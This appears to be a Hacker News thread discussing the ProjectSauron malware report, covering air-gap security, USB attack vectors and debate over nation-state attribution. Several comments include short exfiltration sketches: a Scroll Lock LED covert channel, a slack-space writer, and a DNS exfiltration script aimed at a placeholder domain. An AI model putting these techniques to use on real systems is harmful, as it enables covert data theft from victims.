Obviously that's a tremendous pain to work with, because you're limited to PS/2 keyboards and mice (etc etc), but given that there's no way of authenticating USB devices and they've already been used in various attacks, a serious airgap protocol has to ban USB ports.

You could quite easily hide a USB mass storage device inside a mouse, or with a bit more work have an unmodified mouse with a spare Flash area used for data exfiltration.

(Firewire is even worse, and Thunderbolt lets you onto the PCI bus)


> a serious airgap protocol has to ban USB ports.

This is slightly too strong – it should be “has to ban unsecured USB ports”. By 2002 or so, people I met who worked at SPAWAR were advising conference attendees to follow their standard practice of epoxying necessary USB devices to the computer and completely filling unused ports. That moved USB into the same difficulty class as other physical access attacks, which they were already depending on building security to restrict.

Also note that while it's true that Firewire and Thunderbolt are definitely still riskier, newer versions of Windows, OS X, and Linux can use the IO-MMU to prevent DMA attacks. That started shipping in OS X 10.7 and Windows 8.1 (only when locked) and OS X 10.8 enables that all of the time for hardware made around 2012 and later.


If you just leave out the USB mass storage kernel module when compiling the kernel, the mass storage device won't work anymore while the mouse still works. I wonder if this is a solution to this problem or not, since it seems quite naive.


This is not sufficient. One known vector is to emulate a USB network device that provides a nameserver via DHCP, but no default route, allowing the attacker to MitM chosen connections. And of course you have a plethora of different USB device types with default drivers that probably contain exploitable bugs.


Just speculating: this might mitigate some kernel-level exploits, but since it's typically usb card <--> usb bus/controller <--> PCI bus, presumably hardware or kernel bugs elsewhere in that stack could still be exploited. Interesting thought!


Any USB device gets to be a keyboard and mouse. If it comes down to it, the device could just "type" its payload.


And if that malware can't liberate USB access, and still needs to read data (rather than just writing it), it could exploit the capacity for various devices to emit detectable EM radiation. The fake keyboard/mouse, being inside the Faraday cage, would be able to sense that radiation and extract data that the malware in its payload sends back to it.

In fact, all of this would work equally well with a PS/2 port.


Too easy to have that undone by a security update later. Better to physically disable the ports (fill them with epoxy for example). Much more foolproof and easy to verify.


The BIOS may access USB devices e.g. during boot or config.


> You could quite easily hide a USB mass storage device inside a mouse

AFAIK one could mitigate something like this by really restrictive udev rules only allowing certain usb drivers on certain usb ports (like no usb msc on the port dedicated for keyboard only).


Personally? PC gets locked in a box with some sort of venting. Keyboard / Mouse are plugged in by IT and no one unauthorized has physical access to the PC itself.

If they're serious enough about finding 0-days and exploits in USB or the OS to load this shit, then any physical access to the box itself is off limits.


Cut USB cable; splice new device into cable. Or, open mouse/keyboard case, wire device into USB bus connections.


This is why you need defense in depth: physical seals on components, either protecting cables or keeping them clearly visible where someone can notice tampering, and – above all – having the physical space set up to strictly limit someone's ability to bring arbitrary objects in or spend time alone with sensitive hardware.

Consider what someone with the time, skill, and access to do that could also do without that: opening the case and directly installing some sort of device, planting a camera which records you typing passwords in (“oops, left my cellphone sitting out. Won't happen again!”), planting a radio receiver which opens up all sorts of side channel attacks, installing a passive network tap, etc.

A guard with a metal detector and strict limits on what you can bring into the building or what tools you can use inside is going to do a better job preventing all of those.


Wireless RF keyboard+mouse, external antennas outside of the shielded case?


Can be defeated by a phone charger.

http://samy.pl/keysweeper/


This is genius.


You can mitigate the exploit against standard mass storage drivers, yes, but there are other ways. It appears in this case the host was compromised (so able to override the drivers).

If a userland program can get at the raw HID interface, that can also be used for exfiltration to a tailored device.


  xset led named 'Scroll Lock'
Slow, but works for PS/2 keyboards too.
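A hedged sketch of that channel, shelling out to xset from Python; the 0.2-second bit time is an arbitrary assumption, and the receiver is assumed to be something on the keyboard side that records LED transitions:

    import subprocess, time

    def set_led(on):
        # 'xset led named ...' turns the named indicator on, 'xset -led named ...' turns it off
        subprocess.run(["xset", "led" if on else "-led", "named", "Scroll Lock"], check=True)

    def send(data, bit_time=0.2):
        for byte in data:
            for i in range(8):                       # most significant bit first
                set_led(bool((byte >> (7 - i)) & 1))
                time.sleep(bit_time)
        set_led(False)

    send(b"secret")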


Depends on having a camera pointed at the compromised keyboard, and cameras are the first things banned when setting up a secure environment.


I meant, using a physically compromised keyboard that records LED transitions set by the host, since the context was USB devices that look like normal keyboard or mice but actually contain storage.


The only problem with that is people don't typically carry keyboards around and plug them into different devices.


There's usually going to be some interface between the two worlds, right? You just want it to be highly controlled.

What's left? Optical media? Or are we seriously reduced to a human with two computers reading from one and typing into the other?


Zip disks?


You would also need proper shielding to prevent van Eck phreaking from PS/2, monitor, video card, sound card, internal memory bus, and other rf noise.


And they had every login for the network it was found on:

"The library was masquerading as a Windows password filter, which is something administrators typically use to ensure passwords match specific requirements for length and complexity. The module started every time a network or local user logged in or changed a password, and it was able to view passcodes in plaintext."


Perhaps time to move to 2FA.


This was a network authentication module on a domain controller. It's intercepting every low level token used to authenticate a network transaction, including encryption keys.


If security has been penetrated that far you are already owned.

What really scares me are things that can live in firmware; not just on mass storage drives but also in host system firmware. We've let too many dragons breed in dark places in the name of Digital Restrictions Management.


Can you clarify what exactly is so impressive about this software? I read the article, and I don't see it.


This seems to be the crux of it:

Part of what makes ProjectSauron so impressive is its ability to collect data from air-gapped computers. To do this, it uses specially prepared USB storage drives that have a virtual file system that isn't viewable by the Windows operating system. To infected computers, the removable drives appear to be approved devices, but behind the scenes are several hundred megabytes reserved for storing data that is kept on the air-gapped machines. The arrangement works even against computers in which data-loss prevention software blocks the use of unknown USB drives.


Okay first, it probably doesn't get information from air gapped computers without being plugged in, so let's quit with the voodoo right now. You guys are discounting the possibility of idiocy.

Second, making partitions that Windows doesn't see is trivially easy. I went out of my way to buy a 128gb flash drive nearly 10 years ago at great expense; it had a 4gb FAT32 partition, which is what Windows would see.

It had a 16gb Linux partition, with 8gb of that being an encrypted partition.

I installed a bootloader that allowed it to be switched to if it was plugged in when any computer was starting up.

The other 100gb, you ask? Another partition....


"making partitions that windows doesn't see is trivially easy"

Are we talking "partitions Windows wont mount because they aren't FAT/NTFS" or "partitions that literally do not show up to Windows Disk Management because the disk itself is showing a different capacity. EG: A 16GB USB reporting only 8GB, regardless of the OS installed"

Like one of these, only malicious

https://www.neowin.net/news/fake-chinese-500-gb-external-dri...


A big chunk of space would take some work, but if you only needed a few KB there is slack space (at least a handful of sectors) on the end of every USB drive that doesn't align with partition sizes. I've used it before to store data on how many times my reformatting tool was used on the disk.
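A rough sketch of that slack-space trick in Python, assuming the last partition stops short of the end of the raw device; the device node and payload are placeholders, and it needs enough privilege to open the block device:

    import os

    DEV = "/dev/sdX"           # placeholder device node
    BLOB = b"format-count:42"  # toy payload, padded to one sector below

    fd = os.open(DEV, os.O_RDWR)
    try:
        size = os.lseek(fd, 0, os.SEEK_END)    # total device size in bytes
        os.lseek(fd, size - 512, os.SEEK_SET)  # last sector, past the final partition
        os.write(fd, BLOB.ljust(512, b"\x00")) # normal filesystem tools never look here
    finally:
        os.close(fd)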


I'm not sure. I lost the flash drive, despite living in a tiny one bedroom apartment in Manhattan. Maybe a 3 letter agency took it while I was away.


>Okay first, it probably doesn't get information from air gapped computers without being plugged in, //

A hidden WiFi to create a mesh network, or use ultrasound, seems doable.


Stealth. Being found after 5 years is considerably better concealment than most malware (that is discovered at all).


This seems trivial to me. Heck, you could practically make it full out remote exec and grab output from airgapped machines if USB keys were moved between them frequently enough. Serialize and encrypt tiny blob with command, do the same for the output and dump it back on the same USB drive or the next one plugged in, send the data out the next time it's on an internet connected machine... I don't see any challenge or skill involved here. Good post-exploitation malware is often more about doing simple things right than about doing impressive things though I suppose. Having the exploit that allows this attack to happen is the impressive part.


Heh I gave a talk at DefCon Skytalks last week on this exact exfil method and C&C structure with a live demo using code we wrote....interesting.


> Heh I gave a talk at DefCon Skytalks last week on this exact exfil method and C&C structure with a live demo using code we wrote....interesting.

> Kaspersky researchers still aren't sure precisely how the USB-enabled exfiltration works. The presence of the invisible storage area doesn't in itself allow attackers to seize control of air-gapped computers. The researchers suspect the capability is used only in rare cases and requires use of a zero-day exploit that has yet to be discovered. In all, Project Sauron is made up of at least 50 modules that can be mixed and matched to suit the objectives of each individual infection.

You remarkably have the exact exfil method when that's not disclosed information?


>The attackers used multiple interesting and unusual techniques, including:

> Data exfiltration and real-time status reporting using DNS requests.

Sorry, to be more specific: we spoke on DNS-based exfil using base64-encoded strings in DNS lookups, and also how to use DNS records to control botnets.

So not exact and only part of their method.
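For anyone curious, a minimal sketch of that general pattern (my own illustration, not the talk's code): chunks of data are base64-encoded into labels of lookups against an attacker-controlled zone, here the placeholder exfil.example.com:

    import base64, socket

    DOMAIN = "exfil.example.com"   # placeholder zone whose nameserver the attacker controls
    CHUNK = 32                     # keeps each encoded label under the 63-character limit

    def exfiltrate(data):
        for i in range(0, len(data), CHUNK):
            label = base64.urlsafe_b64encode(data[i:i + CHUNK]).decode().rstrip("=")
            try:
                # The lookup itself carries the payload; the answer doesn't matter.
                socket.gethostbyname("%d.%s.%s" % (i // CHUNK, label, DOMAIN))
            except socket.gaierror:
                pass  # NXDOMAIN is expected; the attacker's server already saw the query

    exfiltrate(b"example secret")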


Is there any part of your talk available online?


This is pretty much the only part. The code from the live demo. I will try and find a place to get the slides up in the next few days if there is any interest:

https://github.com/coryschwartz/dns_exfiltration


I was at the conference but missed this talk. I would love to see the slides. Congrats on speaking at Defcon.


Any further comments on the need for nation-state sized budgets, based on your work?


What criteria are used to determine that malware could only possibly have been made by a nation state? If all it takes is specialist teams and a budget in the millions of dollars (presumably, had it been 10s or 100s of millions, that's what they'd have called it), lots of private entities can pull that together, can't they?


They simply pretend that all skilled attackers are state actors.

Due to how the industry works, they're usually correct.


They probably could, but would they?

At least in the US, publicly traded tech companies are accountable to shareholders: There's some transparency in the accounting, and it's hard for them to throw millions of dollars at a problem before shareholders start asking tough questions.


But a military contractor type of company has lots of obfuscation leeway with "top secret" type of things, doesn't it? And I'd imagine a defence contractor is the type of company that would be interested in the kind of info this kind of malware can gather.


There is some evidence that CITIC Group, a Chinese company, is heavily involved in corporate espionage and the manipulation of foreign nations. There's no particular reason that other large companies, no matter their home countries, could not also be engaged in these types of activities.



My gut feel is that governments have a much more significant ability than the private sector to say things like: "hey, we're going to do this thing and you're not entitled to ask about it".


Is the implication that there must be someone who connects the special USB drives to these air-gapped computers? So the attacker must have local people on the ground.


Well one of the linked/related attacks, called "Equation," was apparently distributed at least once via CD without a person on the ground (near the target, at least).

It says that the CD, containing data about a recent research expedition, was mailed to an academic. It was apparently intercepted in the mail, compromised, and forwarded on.


This is the other kind of MiTM attack: Man in the Mail.


Supposedly, the "drop USB drives in the parking lot" works pretty well to get around air-gapped systems. As well as mailing USB drives to the receptionist, mail room, etc.

Also, this thing was running as a local admin on a domain controller. So either the DC's weren't patched or some zero-days were used. Or perhaps an inside job.


Not supposedly. Every pen-testing company worth their salt uses dropped USB drives and has a very high success rate, because humans suck at security. The malware infects non-gapped systems until it infects a file which is being copied to a gapped system.


The DoD Cybersecurity Awareness training[1] covers this and a number of other physical attacks. I'm not sure how seriously anyone takes it, though.

[1] http://cdsetrain.dtic.mil/cybersecurity/


Well it worked on Mr Robot at least


> the DC's weren't patched

As I understand it, airgapped systems are not in the habit of bringing software updates across the airgap, so unpatched everything is likely.


It's trivial to do with WSUS and offline updates. But yeah, if it's a shit-run environment, it will get owned by someone eventually.


An air-gapped set of servers performing updates from a non-air-gapped WSUS server are not air-gapped servers at all.

If the WSUS server were also air-gapped, then you're in the business of manually downloading each update, verifying it, and copying it over to the air-gapped WSUS server offline.

Microsoft's Windows Update servers have also been compromised in the past. Depending on the level of security you're operating at, taking new windows updates on your air-gapped systems may require having someone decompile and review each update.

In general, being air-gapped prevents infinitely more exploits than Windows updates could ever possibly cure; that is, until one of your admins uses his admin privileges to disable the USB port restrictions for 5 minutes that one time to copy that one file quickly so he can go home for the day. For this, there are epoxied USB ports.
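As a side note, the "verifying it" step above is the one people tend to skip. A minimal sketch of what it might look like, assuming you keep an out-of-band manifest of known-good SHA-256 digests (the manifest format here is made up):

    # Check downloaded update files against a manifest of known-good SHA-256
    # digests before copying them across the air gap. Manifest lines are assumed
    # to look like: "<hex digest>  <filename>".
    import hashlib
    import sys
    from pathlib import Path

    def sha256(path: Path) -> str:
        h = hashlib.sha256()
        with path.open("rb") as f:
            for block in iter(lambda: f.read(1 << 20), b""):
                h.update(block)
        return h.hexdigest()

    def verify(updates_dir: Path, manifest: Path) -> bool:
        ok = True
        for line in manifest.read_text().splitlines():
            expected, name = line.split(maxsplit=1)
            if sha256(updates_dir / name) != expected.lower():
                print(f"MISMATCH: {name}", file=sys.stderr)
                ok = False
        return ok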


> running as a local admin on a domain controller

To nitpick, domain controllers don't have local accounts at all. It was probably running as SYSTEM, which equates to the domain controller's computer account in AD.


The thing I find interesting is that I bet the authors are reading this.


Someone at the NSA is having a bad day reading this.


The article says it was first deployed in 2011. Five years is a pretty good run. I wonder what they're deploying right now?


Probably to the Intel Management Engine/AMD Platform Security Processor. By the time your machine is booting it is too late to detect the infection. Reinstalls won't work.

If I wanted to own a machine and not be detected, that's where I'd live. It's also complex and closed source, so you are basically guaranteed to have exploitable bugs that won't be fixed. It has access to the network and system buses at a layer below the OS, so exfiltration can be done at a layer below what the OS can see.


There's been sufficient evidence that they are involved in hacking/rewriting HDD firmware. See: https://www.wired.com/2015/02/nsa-firmware-hacking/


Now they are in the SMC and the secure enclave.


As to the secure enclave, the very nature of a target that's in SO MANY hands means that it's unlikely to ever remain secure from a motivated state. It's such a catch-22... buy into the mass production, or have something that might really be strongly encrypted, but stands out like a sore thumb by virtue of not being the mass-production model?


>Five years is a pretty good run.

For a project this big & complex, and for something that cost hundreds of millions of dollars to develop, 5 years is paltry. Duqu remained hidden for 11+ years.


Bizarrely, the NSA and other US security agencies seem to have very little interest in defence, preferring surveillance and attack capabilities.


Not sure why that seems so bizarre; that's consistent with US posture since WWII, particularly strategic posture. Defense through force projection and construction of retaliatory capability. "The best defense is a good offense" is almost an underlying assumption of US doctrine. You don't defend yourself by building walls, you defend yourself by removing your adversaries' capabilities or willingness to use those capabilities.

It doesn't seem as though this has been especially effective with regards to information security, however. There are just too many adversaries, it's too hard to project force against them, and there's not much of an effective deterrent effect by sitting on a 'stockpile' of vulnerabilities yourself.

But IMO the disconnect is almost a fundamental one, because it's an area where what has worked fairly well for the US for 60+ years is suddenly falling flat.


There's a visibility bias there: attack capabilities in use are more likely to result in news articles; defense capabilities less so.


If only the media was quick to blame them for cyberattacks that happen under their watch, too. Then they might finally start to care. But because corporate media has such a tight relationship with all the Washington insiders, that never really happens.

One good example from recent times of how well this type of "incentive" works is Google and Stagefright. The media went nuts over Stagefright affecting virtually all Android devices - and for good reason, too.

Since then Google seems to be taking Android security way more seriously, and there have been a lot of serious security improvements in Android (7.0) over the past year.

But these sort of actions seem to happen in slow motion, if at all, when there isn't a hacking/malware catastrophe for which the companies can get blamed in the press.

The NSA pushed hard for new surveillance laws such as CISA with the promise that it's what they need to keep us safe against cyberattacks. So why isn't every single media entity blaming the NSA over every major new data breach that happened since then?


That's a false statement. They work with NIST to develop the standards that are the basis of the infosec industry.


Might be a false statement, but it's effectively true. Defense is part of their charter, but American government and corporations are clearly very vulnerable and are compromised routinely.

At this point I'd argue Google's security bounties have done more to secure the industry.


The problem with NIST (and I believe they admitted this is a problem) is that NIST is required by law to use the relevant experts from government agencies[0], which normally is fine, and exactly what you want. However, the agency when it comes to security is the NSA, and they're in the business of undermining it. Thus the whole Dual_EC_DRBG backdoor debacle.[1]

NIST seems like a good agency trying to do the right things. It's just that they're forced to work with bad actors.

[0] https://www.accessnow.org/its-not-you-its-me-committee-of-cr...

[1] http://www.nist.gov/itl/csd/sp800-90-042114.cfm


For the most part, NIST really has no relevance in infosec. With a few exceptions, they're always way behind, and only focus on a few narrow domains.


Literally every compliance standard in the US references NIST 800-53.

In terms of the "narrow scope" assertion: http://csrc.nist.gov/publications/PubsSPs.html


Part of the military culture: there's no glory, no medals, no promotions in a successful defence.

"Department of Defense" is so PC; things were much more honest back when it was called the "Department of War".


You have to research and implement new attacks in order to design defenses against them.


Well, what do you expect them to do for you? Nationalize and manage your IT infrastructure? They and the DoD publish security guidelines for servers, desktops, etc that any business or government agency can follow. Also do you use SELinux? That's NSA as well.

If you want regulation, that's Congress and POTUS, not the NSA.


Or they're saying, "Oh? That old thing?"

We honestly don't know. It might not even be the NSA.


>> so advanced in its design and execution that it could probably have been developed only with the active support of a nation-state

Why is advanced technology automatically assumed to have the backing of nation-states? Can't several highly motivated and smart individuals create the technology without a nation-state behind them?


That's why they said "probably".

You need to look at things like the complexity of the malware, how many staff it would take to develop and maintain it operationally, the targets selected and what sort of payloads are executed. Criminals tend to have simpler malware that uses known exploits or a small number of zero-days. They generally cast a wide net for their targets, and their payloads typically aim to directly raise funds (ransom, mining, card theft, etc.).

In contrast, nation-states tend to have complex malware with multiple zero-days; greater care is taken to avoid detection, their targets are chosen carefully, and their payloads focus on gathering information and specialized operations.


Some security professionals have expressed the view that insecure endpoints represent a good compromise. That is, without the US government being able to snoop on endpoint devices, encryption would have to be tightly controlled, so that the government could retain intelligence and investigatory capability.

A more cynical view would be that many security firms sell both security and forensics/surveillance. One of those two product lines has to be fundamentally defective.

Is the position that hackable endpoints are a good compromise supportable any longer? Or has it bitten US entities in the ass enough that making truly secure computing a reality for computer users, even if it blinds the surveillance state, becomes the new goal.


I've often heard not that "insecure endpoints represent a good compromise" but instead that since:

1. endpoints are vulnerable because they are exceptionally hard to secure,

2. and attacking endpoints can be targeted and specific,

the government's case that weakening encryption is necessary for warranted search is weak. Even with strong encryption, the government can exploit the targeted communicant's endpoint to learn either the plaintext or the encryption keys. This isn't a compromise so much as a statement of reality and what is likely to remain reality for some time to come. Weakening encryption, for the most part, provides benefits to the government in the form of mass surveillance, but for a variety of reasons doesn't offer much benefit in the form of limited, specific searches.

>making truly secure computing a reality for computer users,

We can make endpoints more secure, but I see no path to endpoint security that will keep out a determined well resourced adversary.


You get what you pay for. Right now, endpoint systems are undefended, even intentionally compromised. The design of endpoint systems assumes all components can be trusted. But those components don't usually undergo testing for vulnerabilities and hidden capabilities.


Anyone know of an instance of airgapped USB-based exploits for Linux-based systems?


What's with all this nonsense about could have "been developed only with the active support of a nation-state"? Do nations suddenly have access to some sort of advanced, alien software development teams?

Feels more like political sabre-rattling to get the public to eventually condone a future attack from our homeland shores of Oceania against the evil Eastasia or Eurasia.


I believe it's less about fear-mongering and more about understanding the level of sophistication of the software. Talk to an anti-malware analyst and they'll tell you how commoditized the malware game is nowadays. There's an endless stream of malware and ransomware which can be linked back to just a handful of frameworks. These types of malware families also fall under the spray-and-pray mentality for distribution: spam, drive-by downloads, infected torrents, etc.

Compare that mass of malware with this one's level of technical sophistication, the OPSEC to prevent detection, and the precise targeting of its victims. Along with other big-name malware (e.g. Stuxnet, Flame), this class of malware is very precise in its objective. It isn't trying to make money for its owners. It isn't trying to replicate itself across the internet endlessly. Rather, it has a key objective of infecting a specific set of networks. So when researchers call out the fact that it is likely to be "state sponsored", they are saying the purpose of the malware is very different from your average piece of malware.


Everything you said is true, but I'd like to elaborate a bit further: sometimes state involvement can be inferred when the exploit involves computing resources which could only be reasonably wielded by a nation-state.

For example, suppose that this exploit involved the reversal of an MD5 hash (and this is simply an example, I'm not saying that the actual exploit did). How much computing power would be required to do this? I couldn't do this reliably on my home machine, nor could I afford the cloud-compute power to perform it. However, assembling a vast array of machines is within reach of a state sponsored intelligence agency.

So, that's often it: at some point, the computation would be so expensive that you'd have to infer that only a nation state could have financed it.
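To put rough numbers on that (the rates and keyspace below are illustrative guesses, not figures from the report — and a true MD5 preimage is out of reach for anyone; the realistic scenario is brute-forcing a bounded keyspace):

    # Back-of-the-envelope: time to exhaust a 12-character lowercase+digit
    # keyspace with a fast hash, at two very different compute budgets.
    keyspace = 36 ** 12                # ~4.7e18 candidates
    one_gpu = 1e10                     # ~10 GH/s for a fast hash (rough guess)
    big_cluster = 10_000 * one_gpu     # a nation-state-sized farm (assumption)

    for label, rate in [("one GPU", one_gpu), ("10k-GPU cluster", big_cluster)]:
        years = keyspace / rate / (3600 * 24 * 365)
        print(f"{label}: ~{years:,.2f} years to exhaust the keyspace")

Roughly 15 years on one GPU versus about half a day on a large farm; that scale gap is what makes the "only a nation-state budget could have done this" inference defensible.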


Essentially, depending on what a piece of malware does, we can identify government software fairly easily, because criminal software has a different set of objectives. Is it possible, though, that corporate software could have similar objectives? I'm thinking corporate-espionage type behaviour.


> Is it possible though that corporate software could have similar objectives? I'm thinking corporate espionage type behaviour.

Yes, it is possible.


It's not that the development techniques are so special, it's that the malware was clearly designed to penetrate ultra high security environments. If you are just making malware to try to steal money, or even most corporate secrets, you don't need to go to all that trouble, so there's little financial incentive for someone other than a nation-state to build malware with those capabilities.


Anyone know what IPs the C&C servers used?

Interested to see what hosting company in the US they used.


[flagged]


Please don't comment like this here.


I think it's a great comment. Look at my comment history if you are curious about context, downvote me if you like, but I stand by it.


> It was also funny to see "Windows" as an approved security blessed OS and then Debian, Ubuntu, OpenBSD rejected

Bribes always help.


We detached this subthread from https://news.ycombinator.com/item?id=12255106 and marked it off-topic.


Paying for certification is what's required. Governments require various certifications to sell to them, and that certification costs money in consultancies. Red Hat paid for the testing, so they get a certification and access to the customer.

It looks like this is probably referring to EAL [1][2].

In a market with a large number of vendors interacting with a large number of relatively unknowledgeable buyers, an oversight team is going to try to find a certification to give guidance (and ass covering).

Yes, this is a barrier to entry, but it's also a learned behaviour as buyers get repeatedly burned.

I would argue that this is equivalent to requiring your plumbers and electricians to be licensed.

[1] https://en.wikipedia.org/wiki/Evaluation_Assurance_Level [2] https://www.redhat.com/en/about/press-releases/red-hat-achie...


EAL (Common Criteria) and also FIPS-140-2 for crypto.


It's easy to see conspiracy everywhere, but the truth is usually much more mundane. It costs a lot of money to security-certify an OS, so they probably only wanted to certify a small number. Windows is obviously the most-used desktop OS for PCs, so that seems the logical choice.



